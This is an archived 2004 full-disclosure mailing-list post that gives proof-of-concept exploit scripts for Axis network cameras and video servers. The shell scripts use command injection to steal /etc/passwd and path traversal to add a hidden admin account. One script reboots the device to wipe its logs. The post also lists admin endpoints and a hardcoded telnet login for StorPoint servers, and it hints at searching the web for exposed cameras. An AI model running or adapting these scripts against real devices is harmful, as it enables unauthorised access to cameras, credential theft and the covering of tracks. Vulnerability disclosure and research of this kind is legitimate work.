[PoC] Nasty bug(s) found in Axis Network Camera/Video Servers

From: bashis (mcw_at_wcd.se)
Date: 08/22/04

  • Next message: Tal0n: "MusicDaemon <= 0.0.3 /etc/shadow Stealer / DoS Exploit" 
    To: full-disclosure@lists.netsys.com
Date: Sun, 22 Aug 2004 13:17:11 +0200 (CEST)

    /* Public disclosure due lack of responce from Axis Communications */

    I have found a couple of bugs in Axis Network Camera/Video Servers.
    (I have all Axis stuff in one e-mail, instead of multiple, lazy me.. ;)

    Vulnerable: Axis 2100/2110/2120/2420/2130 Network Camera, 2400/2401 Video Server.
    (There may be more devices vulnerable)

    Included files (some is simple shell scripts):
    axis-passwd.sh ........... Get /etc/passwd as 'anonymous viewer' v2.34/2.40
    axis-wh00t.sh ............ Add admin account as 'anonymous viewer' v2.12-2.40 (whoops!)
    axis-cgi.txt ............. [bonus] Not so mutch bugs here, but nice to know ;)
    axis-storpoint-cd-E100.txt [bonus] Hardcoded l/p in Storepoint CD servers

    Check each section for more details.

    Quote of the day: Never say "whoops!", always say "Ah, Interesting!"

    Vendor,
    Contacted:
    >To: security@axis.com
    >Date: Mon, 16 Aug 2004 22:48:38 +0200 (CEST)

    Status: No responce what so ever.
    Fix/Workaround: None, v2.40 is the latest known version.
    Url: http://www.axis.com/

    Greets to people in #hack.se @EFnet.

    Have a nice day
    /bashis

    ----[ axis-passwd.sh ]----

    #!/bin/sh
    #
    # Get /etc/passwd from:
    # Axis 2100/2110/2120/2420 Network Camera 2.34/2.40
    # AXIS 2130 PTZ Network Camera
    # AXIS 2400/2401 Video Server
    # (There may be more devices vulnerable)
    #
    # Problem:
    # PARAMETER=`echo $QUERY_STRING | sed 's/\(^.*\)=.*$/\1/'`
    # in 'virtualinput.cgi'
    #
    # Bug found and code by bashis <mcw+at+wcd.se> 2004-08
    # Greets: #hack.se @EFnet
    #
    # FAQ:
    # Q: Where is the cam's?
    # A: Google is your friend.
    #
    if [ ${#*} -ne 2 ]
     then
      printf "\nUsage: %s <ip> <port>\n\n" $0
      exit 1
    fi
    #
    printf "+++ Sending request to %s:%d\n+++ Received:\n" $1 $2
    printf "GET /axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60 HTTP/1.1\n\n" | nc $1 $2
    printf "+++ Yeah, right.. for you maybe, but not for me ;->\n\n+++ Get the passwd file now\n+++ Received:\n"
    printf "GET /local/passwd HTTP/1.0\n\n" | nc $1 $2
    printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n"

    ----[ axis-wh00t.sh ]----

    #!/bin/sh
    #
    # Add admin account with l/p: wh00t/wh00t
    # Axis 2100/2110/2120/2420 Network Camera 2.12-2.40
    # AXIS 2130 PTZ Network Camera
    # AXIS 2400/2401 Video Server
    # (There may be more devices vulnerable)
    #
    # Problem:
    # POST action follows "/../"
    #
    # Bug found and code by bashis <mcw+at+wcd.se> 2004-08
    # Greets: #hack.se @EFnet
    #
    # 2.12 seems to very buggy version, it add wh00t account,
    # but editcgi.cgi seems not to work..
    #
    # Yes, you can use 'editcgi.cgi' to edit /etc/passwd
    # and change/add what you want, or browse around in filesystem.
    #
    # FAQ:
    # Q: Where is the cam's?
    # A: Google is your friend.
    #
    if [ ${#*} -ne 2 ]
     then
      printf "\nUsage: %s <ip> <port>\n\n" $0
      exit 1
    fi
    #
    printf "+++ Sending request to %s:%d\n" $1 $2
    printf "+++ If all went well, you should see the password file soon...\n+++ Received:\n\n"
    printf "POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0\nContent-Length: 250\nPragma: no-cache\n\nconf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables\n" | nc $1 $2 > /dev/null
    # Note.......^^^^^^^^^^^^^^^^^^^^^^
    #
    printf "GET /admin-bin/editcgi.cgi?file=/etc/passwd HTTP/1.0\nHost: 127.0.0.1\nAuthorization: Basic d2gwMHQ6d2gwMHQ=\n\n" | nc $1 $2
    # it's good to clear logfile, so let us reboot the device now
    printf "GET /cgi-bin/admin/restart.cgi HTTP/1.0\nAuthorization: Basic d2gwMHQ6d2gwMHQ=\n\n" | nc $1 $2 > /dev/null
    printf "\n\n+++ You can edit file(s) and browse around filesystem with:\nhttp://$1/admin-bin/editcgi.cgi?file=\n"
    printf "+++ Login with wh00t/wh00t (yes, you can edit /etc/passwd)\n"
    printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n"

    ----[ axis-cgi.txt ]----

    # Well, not so mutch bugs here, but nice to know.. ;)
    #
    # From version: 2.12 and newer.
    # (All dosn't work with 2.12)
    #

    List all availible parameters.
    > http://>/cgi-bin/admin/getparam.cgi
    or
    >     http://>/cgi-bin/admin/getparam.cgi?root.Layout.OwnTitle

    Set one parameter.
    >     http://>/cgi-bin/admin/setparam.cgi?root.Layout.OwnTitle=Lame%20stuff

    # Note, Axis is changing 'cgi-bin' to 'axis-cgi'
    #
    /cgi-bin/admin/systemlog.cgi (show syslog)
    /cgi-bin/admin/serverreport.cgi (use[full|less] reports)
    /cgi-bin/admin/restart.cgi (restart device, also good to clear syslog)
    /cgi-bin/admin/paramlist.cgi (get some config)
    /cgi-bin/admin/getparam.cgi (shown above)
    /cgi-bin/admin/setparam.cgi (shown above)
    /cgi-bin/admin/factorydefault.cgi (hrmm.. ;)
    /admin-bin/editcgi.cgi?file= (browse filesystem, edit any file)

    ----[ axis-storpoint-cd-E100.txt ]----

    # Yeah, old product.. old version.. but.. hardcoded l/p, uhm?
    # l: copyright p: mammalambalouie
    #
    # Note, this hardcoded l/p exist in other products and newer versions
    # of software as well, but i have not done so mutch research about this.

    $ telnet xxx.xxx.xxx.xxx
    Trying xxx.xxx.xxx.xxx...
    Connected to xxx.xxx.xxx.xxx.
    Escape character is '^]'.

    AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000

    AXIS StorPoint CD E100 network login: copyright
    Password: mammalambalouie

    AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000

    Root>
    Root> q
    Goodbye!
    Connection closed by foreign host.
    $ 

    ----
  • Next message: Tal0n: "MusicDaemon <= 0.0.3 /etc/shadow Stealer / DoS Exploit"

    Relevant Pages